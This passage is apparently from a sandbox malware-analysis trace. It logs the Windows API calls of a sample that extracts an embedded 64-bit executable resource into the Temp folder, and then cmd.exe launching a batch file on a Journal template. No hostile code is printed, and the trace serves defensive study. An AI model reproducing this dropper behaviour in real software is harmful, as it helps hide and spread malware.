!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿôË©Þäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0220.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2c9230 [0220.802] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0220.802] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0220.802] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2c9230) returned 0x80 [0220.803] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0220.803] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0220.803] GetCurrentProcess () returned 0xffffffff [0220.803] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0220.803] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0220.803] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0220.806] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0220.806] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0220.806] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0220.806] LockResource (hResData=0x43c648) returned 0x43c648 [0220.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2c9700 [0220.807] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0220.827] GetLastError () returned 0x20 [0220.827] GetLastError () returned 0x20 [0220.827] SetLastError (dwErrCode=0x20) [0220.827] GetLastError () returned 0x20 [0220.827] SetLastError (dwErrCode=0x20) [0220.827] GetLastError () returned 0x20 [0220.827] SetLastError (dwErrCode=0x20) [0220.828] GetLastError () returned 0x20 [0220.828] SetLastError (dwErrCode=0x20) [0220.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1000) returned 0x2c9720 [0220.829] GetLastError () returned 0x20 [0220.829] SetLastError (dwErrCode=0x20) [0220.830] GetLastError () returned 0x20 [0220.830] SetLastError (dwErrCode=0x20) [0220.830] GetLastError () returned 0x20 [0220.830] SetLastError (dwErrCode=0x20) [0220.830] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0220.832] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0220.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8800 | out: hHeap=0x2b0000) returned 1 [0220.837] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0220.837] ExitProcess (uExitCode=0x1) [0220.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c70a0 | out: hHeap=0x2b0000) returned 1 Process: id = "217" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2b756000" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 789 os_tid = 0xb4c [0221.018] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3df93c | out: lpSystemTimeAsFileTime=0x3df93c*(dwLowDateTime=0x3bc44a60, dwHighDateTime=0x1d68287)) [0221.018] GetCurrentProcessId () returned 0xad4 [0221.018] GetCurrentThreadId () returned 0xb4c [0221.018] GetTickCount () returned 0x116317d [0221.018] QueryPerformanceCounter (in: lpPerformanceCount=0x3df934 | out: lpPerformanceCount=0x3df934*=34199147631) returned 1 [0221.656] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0221.656] __set_app_type (_Type=0x1) [0221.656] __p__fmode () returned 0x770331f4 [0221.656] __p__commode () returned 0x770331fc [0221.656] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0221.656] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0221.656] GetCurrentThreadId () returned 0xb4c [0221.656] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb4c) returned 0x60 [0221.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0221.657] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0221.657] SetThreadUILanguage (LangId=0x0) returned 0x409 [0221.658] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0221.658] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3df8cc | out: phkResult=0x3df8cc*=0x0) returned 0x2 [0221.658] VirtualQuery (in: lpAddress=0x3df903, lpBuffer=0x3df89c, dwLength=0x1c | out: lpBuffer=0x3df89c*(BaseAddress=0x3df000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0221.658] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x3df89c, dwLength=0x1c | out: lpBuffer=0x3df89c*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0221.658] VirtualQuery (in: lpAddress=0x2e1000, lpBuffer=0x3df89c, dwLength=0x1c | out: lpBuffer=0x3df89c*(BaseAddress=0x2e1000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0221.658] VirtualQuery (in: lpAddress=0x2e3000, lpBuffer=0x3df89c, dwLength=0x1c | out: lpBuffer=0x3df89c*(BaseAddress=0x2e3000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0221.658] VirtualQuery (in: lpAddress=0x3e0000, lpBuffer=0x3df89c, dwLength=0x1c | out: lpBuffer=0x3df89c*(BaseAddress=0x3e0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0221.658] GetConsoleOutputCP () returned 0x1b5 [0221.659] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0221.659] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0221.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.659] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0221.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.659] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0221.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.660] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0221.660] _get_osfhandle (_FileHandle=0) returned 0x3 [0221.660] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0221.661] _get_osfhandle (_FileHandle=0) returned 0x3 [0221.661] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0221.662] GetEnvironmentStringsW () returned 0x472118* [0221.662] GetProcessHeap () returned 0x460000 [0221.662] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xaca) returned 0x472bf0 [0221.662] FreeEnvironmentStringsW (penv=0x472118) returned 1 [0221.662] GetProcessHeap () returned 0x460000 [0221.662] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4) returned 0x4718b0 [0221.662] GetEnvironmentStringsW () returned 0x472118* [0221.662] GetProcessHeap () returned 0x460000 [0221.662] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xaca) returned 0x4736c8 [0221.663] FreeEnvironmentStringsW (penv=0x472118) returned 1 [0221.663] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3de83c | out: phkResult=0x3de83c*=0x68) returned 0x0 [0221.663] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x0, lpData=0x3de848*=0x0, lpcbData=0x3de840*=0x1000) returned 0x2 [0221.663] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x4, lpData=0x3de848*=0x1, lpcbData=0x3de840*=0x4) returned 0x0 [0221.663] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x0, lpData=0x3de848*=0x1, lpcbData=0x3de840*=0x1000) returned 0x2 [0221.663] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x4, lpData=0x3de848*=0x0, lpcbData=0x3de840*=0x4) returned 0x0 [0221.663] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x4, lpData=0x3de848*=0x40, lpcbData=0x3de840*=0x4) returned 0x0 [0221.663] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x4, lpData=0x3de848*=0x40, lpcbData=0x3de840*=0x4) returned 0x0 [0221.663] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x0, lpData=0x3de848*=0x40, lpcbData=0x3de840*=0x1000) returned 0x2 [0221.664] RegCloseKey (hKey=0x68) returned 0x0 [0221.664] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3de83c | out: phkResult=0x3de83c*=0x68) returned 0x0 [0221.664] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x0, lpData=0x3de848*=0x40, lpcbData=0x3de840*=0x1000) returned 0x2 [0221.664] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x4, lpData=0x3de848*=0x1, lpcbData=0x3de840*=0x4) returned 0x0 [0221.664] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x0, lpData=0x3de848*=0x1, lpcbData=0x3de840*=0x1000) returned 0x2 [0221.664] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x4, lpData=0x3de848*=0x0, lpcbData=0x3de840*=0x4) returned 0x0 [0221.664] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x4, lpData=0x3de848*=0x9, lpcbData=0x3de840*=0x4) returned 0x0 [0221.664] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x4, lpData=0x3de848*=0x9, lpcbData=0x3de840*=0x4) returned 0x0 [0221.664] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3de844, lpData=0x3de848, lpcbData=0x3de840*=0x1000 | out: lpType=0x3de844*=0x0, lpData=0x3de848*=0x9, lpcbData=0x3de840*=0x1000) returned 0x2 [0221.664] RegCloseKey (hKey=0x68) returned 0x0 [0221.664] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2f7 [0221.664] srand (_Seed=0x5f51e2f7) [0221.664] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"\"" [0221.664] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"\"" [0221.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0221.666] GetProcessHeap () returned 0x460000 [0221.666] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x472118 [0221.666] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x472120, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0221.666] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0221.666] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0221.666] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0221.666] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0221.666] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0221.667] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0221.667] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0221.667] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0221.667] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0221.667] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0221.667] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0221.667] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0221.667] GetProcessHeap () returned 0x460000 [0221.667] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x472bf0 | out: hHeap=0x460000) returned 1 [0221.667] GetEnvironmentStringsW () returned 0x472330* [0221.667] GetProcessHeap () returned 0x460000 [0221.667] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xae2) returned 0x474c90 [0221.667] FreeEnvironmentStringsW (penv=0x472330) returned 1 [0221.667] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.667] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0221.667] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0221.667] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0221.667] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0221.668] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0221.668] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0221.668] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0221.668] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0221.668] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0221.668] GetProcessHeap () returned 0x460000 [0221.668] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x54) returned 0x4717e0 [0221.668] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3df608 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0221.668] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3df608, lpFilePart=0x3df604 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3df604*="Desktop") returned 0x25 [0221.668] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0221.668] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3df384 | out: lpFindFileData=0x3df384*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x475780 [0221.668] FindClose (in: hFindFile=0x475780 | out: hFindFile=0x475780) returned 1 [0221.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3df384 | out: lpFindFileData=0x3df384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x475780 [0221.668] FindClose (in: hFindFile=0x475780 | out: hFindFile=0x475780) returned 1 [0221.668] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0221.669] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3df384 | out: lpFindFileData=0x3df384*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x475780 [0221.669] FindClose (in: hFindFile=0x475780 | out: hFindFile=0x475780) returned 1 [0221.669] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0221.669] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0221.669] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0221.669] GetProcessHeap () returned 0x460000 [0221.669] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474c90 | out: hHeap=0x460000) returned 1 [0221.669] GetEnvironmentStringsW () returned 0x4741a0* [0221.669] GetProcessHeap () returned 0x460000 [0221.669] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb36) returned 0x475fc0 [0221.669] FreeEnvironmentStringsW (penv=0x4741a0) returned 1 [0221.669] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0221.669] GetProcessHeap () returned 0x460000 [0221.669] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4717e0 | out: hHeap=0x460000) returned 1 [0221.669] GetProcessHeap () returned 0x460000 [0221.669] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400e) returned 0x476b00 [0221.670] GetProcessHeap () returned 0x460000 [0221.670] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xf4) returned 0x472e70 [0221.670] GetProcessHeap () returned 0x460000 [0221.670] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4008) returned 0x47ab18 [0221.670] GetProcessHeap () returned 0x460000 [0221.670] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4008) returned 0x47eb28 [0221.670] GetProcessHeap () returned 0x460000 [0221.670] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476b00 | out: hHeap=0x460000) returned 1 [0221.670] GetConsoleOutputCP () returned 0x1b5 [0222.187] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0222.187] GetUserDefaultLCID () returned 0x409 [0222.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0222.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3df748, cchData=128 | out: lpLCData="0") returned 2 [0222.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3df748, cchData=128 | out: lpLCData="0") returned 2 [0222.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3df748, cchData=128 | out: lpLCData="1") returned 2 [0222.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0222.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0222.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0222.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0222.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0222.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0222.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0222.189] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0222.189] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0222.189] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0222.189] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0222.191] GetProcessHeap () returned 0x460000 [0222.191] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20c) returned 0x472f70 [0222.191] GetConsoleTitleW (in: lpConsoleTitle=0x472f70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0222.191] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0222.191] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0222.191] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0222.192] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0222.193] GetProcessHeap () returned 0x460000 [0222.193] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x476b00 [0222.194] GetProcessHeap () returned 0x460000 [0222.194] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476b00 | out: hHeap=0x460000) returned 1 [0222.197] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0222.197] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0222.197] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0222.197] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0222.197] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0222.197] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0222.197] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0222.197] GetProcessHeap () returned 0x460000 [0222.197] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473188 [0222.197] GetProcessHeap () returned 0x460000 [0222.197] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x72) returned 0x482b50 [0222.200] GetProcessHeap () returned 0x460000 [0222.200] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x84) returned 0x4731e8 [0222.201] GetConsoleTitleW (in: lpConsoleTitle=0x3df440, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0222.203] 